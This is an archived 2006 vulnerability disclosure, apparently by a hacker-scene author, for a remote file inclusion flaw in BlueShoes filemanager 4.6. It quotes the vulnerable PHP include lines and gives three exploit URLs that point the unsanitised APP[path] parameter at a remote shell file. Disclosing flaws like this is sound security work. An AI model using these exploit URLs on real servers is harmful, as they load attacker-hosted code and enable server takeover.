Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14870
HistoryOct 31, 2006 - 12:00 a.m.

New Vunerability

2006-10-3100:00:00
vulners.com
18

###########################################################

blueshoes-filemanager-4.6_public

$it£ :

www.blueshoes.org
###########################################################

Remote File Include Vulnerability (APP[path][core])

Auth0r : x_w0x

#c0ntact : x_w0x[at]Hotmail[d0t]com
#w£lc0m£ In x0|0x
#=======================================================
#C0d£ :

./file.php
require_once($APP['path']['core'] . 'util/Bs_UnitConverter.class.php');
require_once($APP['path']['core'] . 'net/http/Bs_Browscap.class.php')

-global.conf.php
include_once($APP['path']['bsRoot'] . 'blueshoes.ini.php')

-viewer.php
require_once($APP['path']['core'] 'file/Bs_FileSystem.class.php');
require_once($APP['path']['core'] . 'file/Bs_FileUtil.class.php')

#£xpl0it:

http://host.com/[path]/applications/flemanager/file.php?APP[path][core]=$h£ll.txt?
http://host.com/[path]/applications/flemanager/global.conf.php?APP[path][bsRoot]=$h£ll.txt?
http://host.com/[path]/applications/flemanager/viewer.php?APP[path][bsRoot]=$h£ll.txt?

Gr££tz : makoki , azzcoder ,xoron , osm@n
$p£cial Gr££tz : str0k ,elite-team and all H4ck£r$ 0_°

Ramadan Karima all musulmano ^_*

Download :http://download.blueshoes.org/blueshoes-filemanager-4.6_public.zip


MSN Hotmail sur i-mode™ : envoyez et recevez des e-mails depuis votre
téléphone portable ! http://www.msn.fr/hotmailimode/